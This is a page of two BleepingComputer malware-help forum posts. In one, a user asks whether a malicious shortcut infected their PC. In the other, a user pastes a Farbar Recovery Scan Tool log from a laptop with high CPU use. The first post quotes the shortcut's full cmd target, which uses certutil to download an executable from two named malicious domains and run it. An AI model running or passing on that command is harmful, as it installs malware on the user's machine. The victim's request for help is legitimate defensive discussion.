
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Posted: 06 Jul 2020 11:33 AM PDT

Hi all,

Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage. When I did double click it, I remember getting a standard Windows dialog box. I believe it said the path did not exist or shortcut unavailable. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder... I ran scans with Malwarebytes, Hitman with no results.

The .lnk file target was:

%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1

The .lnk file 'start-in' was:

"%APPDATA%\Mic…

Laptop started going to 99-100% CPU suddenly......infected with ??? - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer


Posted: 29 Nov 2019 12:00 AM PST

Laptop HP stream was working fine, then it slowed way down. When I went to task manager I noticed it going to 99-100% CPU which it was not doing before. Not sure what I picked up???

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 25-11-2019 01
Ran by JasonSt (administrator) on JASONS (Hewlett-Packard HP Stream Notebook PC 11) (29-11-2019 15:22:00)
Running from C:\Users\JasonSt\Downloads
Loaded Profiles: JasonSt (Available Profiles: JasonSt)
Platform: Windows 8.1 Connected (Update) (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\aswidsagent.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(BitTorrent Inc -> BitTorrent Inc.) C:\Users\JasonSt\AppData\Roaming\uTorrent\helper\helper.exe
(BitTorrent Inc -> BitTorrent Inc.) C:\Users\JasonSt\AppData\Roaming\uTorrent\updates\3.5.5_45395\utorrentie.exe
(BitTorrent Inc -> BitTorrent Inc.) C:\Users\JasonSt\AppData\Roaming\uTorrent\updates\3.5.5_45395\utorrentie.exe
(BitTorrent Inc -> BitTorrent Inc.) C:\Users\JasonSt\AppData\Roaming\uTorrent\uTorrent.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\StikyNot.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\WWAHost.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7637208 2014-09-15] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\Windows\System32\DptfPolicyLpmServiceHelper.exe [111488 2014-09-05] (Intel® Software -> Intel Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2855664 2014-09-05] (Synaptics Incorporated -> Synaptics Incorporated)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [268680 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe [507192 2014-07-21] (Hewlett-Packard Company -> Hewlett-Packard Development Company, L.P.)
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [83524968 2019-11-12] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [24552064 2019-10-15] (Piriform Software Ltd -> Piriform Ltd)
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [479744 2014-11-21] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\Run: [uTorrent] => C:\Users\JasonSt\AppData\Roaming\uTorrent\uTorrent.exe [2005224 2019-11-05] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\Policies\Explorer: [NolowDiskSpaceChecks] 1
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\75.0.3770.100\Installer\chrmstp.exe [2019-07-03] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\75.0.3770.100\Installer\chrmstp.exe [2019-07-03] (Google LLC -> Google LLC)
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {3F99B290-AAC8-4123-8000-980238021EBB} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [3933576 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
Task: {78E9F272-075E-4019-90BB-28556801FD46} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [608384 2019-10-15] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {82253D40-4652-4B1E-B9E5-3ED44957649C} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => %windir%\system32\rundll32.exe aepdu.dll,AePduRunUpdate -nolegacy
Task: {83E0DE61-C54B-48CB-9247-176659CC8105} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {8A8446AC-8FA3-401D-B7E6-52123E0E71A1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154920 2019-07-03] (Google Inc -> Google LLC)
Task: {8EA5AFDE-38E5-4A12-81DE-3723E5FBF652} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [1873288 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
Task: {B927DBAF-D2AC-4323-940F-7FFB1FDE4F0B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154920 2019-07-03] (Google Inc -> Google LLC)
Task: {C796EAAA-60EF-4971-B1DC-8857FB68616E} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [18458752 2019-10-15] (Piriform Software Ltd -> Piriform Ltd)
Task: {CFCC10C2-897D-4FF5-BB38-DCC8E8D4FC25} - System32\Tasks\HPCheckDropBoxStatus => c:\hp\HPQWare\DropBox\HPAppDetector.exe [88864 2014-06-19] (Hewlett-Packard Company -> )
Task: {E1F8A647-3BA4-4A2A-BAF8-9F7633B0C30B} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [267440 2019-08-02] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [121704 2011-08-31] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [132968 2011-08-31] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{B73FD225-ADF5-4F5D-BD5A-6A18CC356CDC}: [DhcpNameServer] 192.168.0.1
Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.msn.com/HPNOT14/1
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.msn.com/HPNOT14/1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://js.redirect.hp.com/jumpstation?bd=all&c=144&locale=ww_ww&pf=cnnb&s=ieHPtab&tp=iehome
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/en-xl/?ocid=iehp
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {68127DF2-7504-46AE-B573-9E874CA84C2B} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-4252122962-1682857245-3195559886-1001 -> {68127DF2-7504-46AE-B573-9E874CA84C2B} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_16_0_0_257.dll [2019-08-02] (Adobe Systems Incorporated -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_257.dll [2019-08-02] (Adobe Systems Incorporated -> )
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-07-03] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-07-03] (Google Inc -> Google LLC)
CHR StartupUrls: Default -> "hxxps://www.google.com/"
CHR Profile: C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default [2019-11-29]
CHR Extension: (Slides) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-07-03]
CHR Extension: (Adblocker for Chrome - NoAds) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\alplpnakfeabeiebipdmaenpmbgknjce [2019-07-03]
CHR Extension: (Docs) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-07-03]
CHR Extension: (Google Drive) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-07-03]
CHR Extension: (YouTube) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-07-03]
CHR Extension: (Sheets) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-07-03]
CHR Extension: (Google Docs Offline) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-07-03]
CHR Extension: (Chrome Web Store Payments) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (Gmail) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-07-03]
CHR Extension: (Chrome Media Router) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-07-03]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [6085360 2019-09-26] (AVAST Software s.r.o. -> AVAST Software)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [996880 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
S3 DptfParticipantAcpiProcessorService; C:\WINDOWS\system32\DptfParticipantProcessorService.exe [115656 2014-09-05] (Intel® Software -> Intel Corporation)
S3 HPWMISVC; c:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe [476984 2014-07-21] (Hewlett-Packard Company -> Hewlett-Packard Development Company, L.P.)
S3 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [318568 2014-09-15] (Intel Corporation - pGFX -> Intel Corporation)
S3 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-02] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-02] (Intel® Trusted Connect Service -> Intel® Corporation)
S3 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [292568 2014-09-15] (Realtek Semiconductor Corp -> Realtek Semiconductor)
S3 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [220912 2014-09-05] (Synaptics Incorporated -> Synaptics Incorporated)
S3 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11814232 2019-06-05] (TeamViewer GmbH -> TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2015-01-17] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-01-17] (Microsoft Corporation -> Microsoft Corporation)
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R0 aswArDisk; C:\WINDOWS\System32\drivers\aswArDisk.sys [37616 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\WINDOWS\System32\drivers\aswArPot.sys [204824 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\WINDOWS\System32\drivers\aswbidsdriver.sys [274456 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\WINDOWS\System32\drivers\aswbidsh.sys [209552 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\WINDOWS\System32\drivers\aswbuniv.sys [65120 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\WINDOWS\System32\drivers\aswKbd.sys [42736 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R2 aswMonFlt; C:\WINDOWS\System32\drivers\aswMonFlt.sys [171520 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\WINDOWS\System32\drivers\aswRdr2.sys [110320 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\WINDOWS\System32\drivers\aswRvrt.sys [83792 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\WINDOWS\System32\drivers\aswSnx.sys [848432 2019-09-30] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSP; C:\WINDOWS\System32\drivers\aswSP.sys [460448 2019-09-30] (AVAST Software s.r.o. -> AVAST Software)
R2 aswStm; C:\WINDOWS\System32\drivers\aswStm.sys [236024 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\WINDOWS\System32\drivers\aswVmm.sys [316528 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
S3 AX88772; C:\WINDOWS\system32\DRIVERS\ax88772.sys [113864 2013-07-18] (WDKTestCert asix,130126255272009909 -> ASIX Electronics Corp.)
S3 bcmfn2; C:\WINDOWS\System32\drivers\bcmfn2.sys [17624 2013-08-13] (Broadcom Corporation -> Windows ® Win 7 DDK provider)
S3 cpuz145; C:\WINDOWS\temp\cpuz145\cpuz145_x64.sys [49968 2019-11-27] (CPUID -> CPUID)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 DptfDevAcpiProc; C:\WINDOWS\system32\DRIVERS\DptfDevAcpiProc.sys [198808 2014-09-05] (Intel® Software -> Intel Corporation)
S3 DptfDevDisplay; C:\WINDOWS\System32\drivers\DptfDevDisplay.sys [70752 2014-09-05] (Intel® Software -> Intel Corporation)
S3 DptfDevDram; C:\WINDOWS\System32\drivers\DptfDevDram.sys [145640 2014-09-05] (Intel® Software -> Intel Corporation)
S3 DptfDevFan; C:\WINDOWS\System32\drivers\DptfDevFan.sys [50640 2014-09-05] (Intel® Software -> Intel Corporation)
R3 DptfDevGen; C:\WINDOWS\system32\DRIVERS\DptfDevGen.sys [78504 2014-09-05] (Intel® Software -> Intel Corporation)
S3 DptfDevPch; C:\WINDOWS\System32\drivers\DptfDevPch.sys [116752 2014-09-05] (Intel® Software -> Intel Corporation)
S3 DptfDevPower; C:\WINDOWS\System32\drivers\DptfDevPower.sys [71808 2014-09-05] (Intel® Software -> Intel Corporation)
R3 DptfManager; C:\WINDOWS\system32\DRIVERS\DptfManager.sys [493240 2014-09-05] (Intel® Software -> Intel Corporation)
R3 GPIO; C:\WINDOWS\System32\drivers\iaiogpioe.sys [31232 2014-08-11] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
R3 iaioi2c; C:\WINDOWS\System32\drivers\iaioi2ce.sys [69632 2014-08-11] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
R0 MBI; C:\WINDOWS\System32\drivers\MBI.sys [29464 2014-08-05] (Intel® Software -> Intel Corporation)
S3 RTL8168; C:\WINDOWS\system32\DRIVERS\Rt630x64.sys [591360 2013-06-18] (Microsoft Windows -> Realtek )
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 SynRMIHID; C:\WINDOWS\system32\DRIVERS\SynRMIHID.sys [42736 2014-09-05] (Synaptics Incorporated -> Synaptics Incorporated)
R3 TXEIx64; C:\WINDOWS\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation - Client Components Group -> Intel Corporation)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [35320 2015-01-17] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [258368 2015-01-17] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [114496 2015-01-17] (Microsoft Windows -> Microsoft Corporation)
R3 WirelessButtonDriver; C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-23] (Hewlett-Packard Company -> Hewlett-Packard Development Company, L.P.)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-11-29 15:22 - 2019-11-29 15:22 - 000019083 _____ C:\Users\JasonSt\Downloads\FRST.txt
2019-11-29 15:20 - 2019-11-29 15:20 - 002262016 _____ (Farbar) C:\Users\JasonSt\Downloads\FRST64.exe
2019-11-29 15:20 - 2019-11-29 15:20 - 000000000 ____D C:\Users\JasonSt\Downloads\FRST-OlderVersion
2019-11-29 10:35 - 2019-11-29 10:42 - 220199200 ____R C:\Users\JasonSt\Downloads\Winnie the Pooh and Christmas Too (1991) [TVRip] - QuincyMKT.avi
2019-11-27 21:09 - 2019-11-27 21:09 - 008218800 _____ (Malwarebytes) C:\Users\JasonSt\Downloads\adwcleaner_8.0.0.exe
2019-11-27 20:58 - 2019-09-12 09:59 - 000178960 _____ (IObit) C:\WINDOWS\system32\IObitSmartDefragExtension.dll
2019-11-27 20:55 - 2019-11-27 20:55 - 065437696 _____ C:\WINDOWS\system32\config\SOFTWARE.iobit
2019-11-27 20:55 - 2019-11-27 20:55 - 000290816 _____ C:\WINDOWS\system32\config\DEFAULT.iobit
2019-11-27 20:55 - 2019-11-27 20:55 - 000028672 _____ C:\WINDOWS\system32\config\SAM.iobit
2019-11-27 20:55 - 2019-11-27 20:55 - 000024576 _____ C:\WINDOWS\system32\config\SECURITY.iobit
2019-11-26 20:31 - 2019-11-26 20:31 - 000017132 _____ C:\Users\JasonSt\Downloads\187333-killing.me.softly.2012.brrip.xvid.ac3war.zip
2019-11-26 20:27 - 2019-11-26 21:01 - 745379840 _____ C:\Users\JasonSt\Downloads\Something Wild.avi
2019-11-18 23:46 - 2019-11-18 23:46 - 000000000 ____D C:\Users\JasonSt\Documents\Apowersoft
2019-11-18 23:45 - 2019-11-18 23:46 - 000000000 ____D C:\Users\JasonSt\AppData\Local\Apowersoft
2019-11-18 23:45 - 2019-11-18 23:45 - 000000000 ____D C:\Users\JasonSt\AppData\Roaming\Apowersoft
2019-11-18 22:09 - 2019-11-18 22:09 - 000030743 _____ C:\Users\JasonSt\Downloads\221509-somethingwild1986.zip
2019-11-14 22:52 - 2017-03-09 13:53 - 000045664 _____ (IObit) C:\WINDOWS\system32\SmartDefragBootTime.exe
2019-11-14 22:50 - 2019-11-14 22:51 - 016297184 _____ (IObit ) C:\Users\JasonSt\Downloads\smart-defrag-setup.exe
2019-11-14 22:37 - 2019-11-14 22:37 - 004833280 _____ C:\WINDOWS\system32\config\DRIVERS.iobit
2019-11-14 22:30 - 2019-11-27 20:52 - 000000000 ____D C:\ProgramData\ProductData
2019-11-14 22:30 - 2019-11-27 20:51 - 000000000 ____D C:\Users\JasonSt\AppData\LocalLow\IObit
2019-11-14 22:30 - 2019-11-14 22:30 - 000000000 ____D C:\WINDOWS\Tasks\ImCleanDisabled
2019-11-14 22:30 - 2019-11-14 22:30 - 000000000 ____D C:\ProgramData\{F86B0233-9A85-4589-8AAF-524CC4F8211B}
2019-11-14 22:29 - 2019-11-27 21:04 - 000000000 ____D C:\Program Files (x86)\IObit
2019-11-14 22:29 - 2019-11-27 20:59 - 000000000 ____D C:\Users\JasonSt\AppData\Roaming\IObit
2019-11-14 22:29 - 2019-11-27 20:58 - 000000000 ____D C:\ProgramData\IObit
2019-11-14 22:28 - 2019-11-14 22:29 - 049471584 _____ (IObit ) C:\Users\JasonSt\Downloads\advanced-systemcare-setup.exe
2019-11-06 10:55 - 2019-11-06 10:55 - 000110218 _____ C:\Users\JasonSt\Downloads\5837eForeignerForm.pdf
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-11-29 15:22 - 2019-07-20 11:07 - 000000000 ____D C:\Users\JasonSt\AppData\Roaming\uTorrent
2019-11-29 15:22 - 2019-07-04 21:09 - 000000000 ____D C:\FRST
2019-11-29 15:20 - 2019-07-04 13:17 - 003527168 ___SH C:\Users\JasonSt\Downloads\Thumbs.db
2019-11-29 14:36 - 2014-11-21 05:42 - 000762136 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-11-29 14:36 - 2013-08-22 14:36 - 000000000 ____D C:\WINDOWS\Inf
2019-11-29 13:31 - 2019-07-03 17:53 - 000003600 _____ C:\WINDOWS\system32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-4252122962-1682857245-3195559886-1001
2019-11-29 13:01 - 2019-08-09 23:40 - 000000000 ____D C:\Users\JasonSt\AppData\LocalLow\uTorrent
2019-11-29 13:01 - 2019-07-20 11:07 - 000000000 ____D C:\Users\JasonSt\AppData\Local\BitTorrentHelper
2019-11-29 12:46 - 2013-08-22 15:45 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-11-29 09:30 - 2019-07-03 17:48 - 000000000 ____D C:\Users\JasonSt
2019-11-28 10:06 - 2019-07-03 17:58 - 000004168 _____ C:\WINDOWS\system32\Tasks\Avast Emergency Update
2019-11-28 09:40 - 2019-07-04 11:02 - 000004128 _____ C:\WINDOWS\system32\Tasks\CCleaner Update
2019-11-27 20:56 - 2015-01-17 08:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2019-11-27 10:53 - 2019-07-06 22:20 - 000000000 ____D C:\AmericasCardroom
2019-11-15 18:57 - 2019-07-04 10:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2019-11-14 22:42 - 2019-07-04 09:55 - 000000000 ____D C:\Users\JasonSt\AppData\Local\Hewlett-Packard
2019-11-14 22:42 - 2019-07-03 17:52 - 000000000 ____D C:\Users\JasonSt\AppData\Roaming\Hewlett-Packard
2019-11-14 22:42 - 2015-05-22 00:19 - 000000000 ____D C:\ProgramData\Hewlett-Packard
2019-11-14 22:42 - 2015-01-17 08:01 - 000000000 ____D C:\Program Files (x86)\Hewlett-Packard
2019-11-14 22:42 - 2015-01-16 19:29 - 000000000 ___HD C:\hp
2019-11-14 22:33 - 2014-12-10 05:00 - 000000000 ____D C:\WINDOWS\Panther
2019-11-12 23:43 - 2019-08-24 23:29 - 000000000 ____D C:\Users\JasonSt\AppData\Local\CrashDumps
2019-10-31 11:28 - 2019-07-20 11:07 - 000000000 ____D C:\Users\JasonSt\AppData\Roaming\Lavasoft
2019-10-31 11:28 - 2019-07-20 11:07 - 000000000 ____D C:\Users\JasonSt\AppData\Local\Lavasoft
2019-10-31 11:28 - 2019-07-20 11:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2019-10-31 11:28 - 2019-07-20 11:07 - 000000000 ____D C:\ProgramData\Lavasoft
2019-10-31 11:28 - 2019-07-20 11:07 - 000000000 ____D C:\Program Files (x86)\Lavasoft
2019-10-31 11:28 - 2019-07-06 14:30 - 000000000 ____D C:\AdwCleaner
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
LastRegBack: 2019-11-22 20:24
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 25-11-2019 01
Ran by JasonSt (29-11-2019 15:23:52)
Running from C:\Users\JasonSt\Downloads
Windows 8.1 Connected (Update) (X64) (2019-07-03 16:48:05)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-4252122962-1682857245-3195559886-500 - Administrator - Disabled)
Guest (S-1-5-21-4252122962-1682857245-3195559886-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-4252122962-1682857245-3195559886-1003 - Limited - Enabled)
JasonSt (S-1-5-21-4252122962-1682857245-3195559886-1001 - Administrator - Enabled) => C:\Users\JasonSt
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
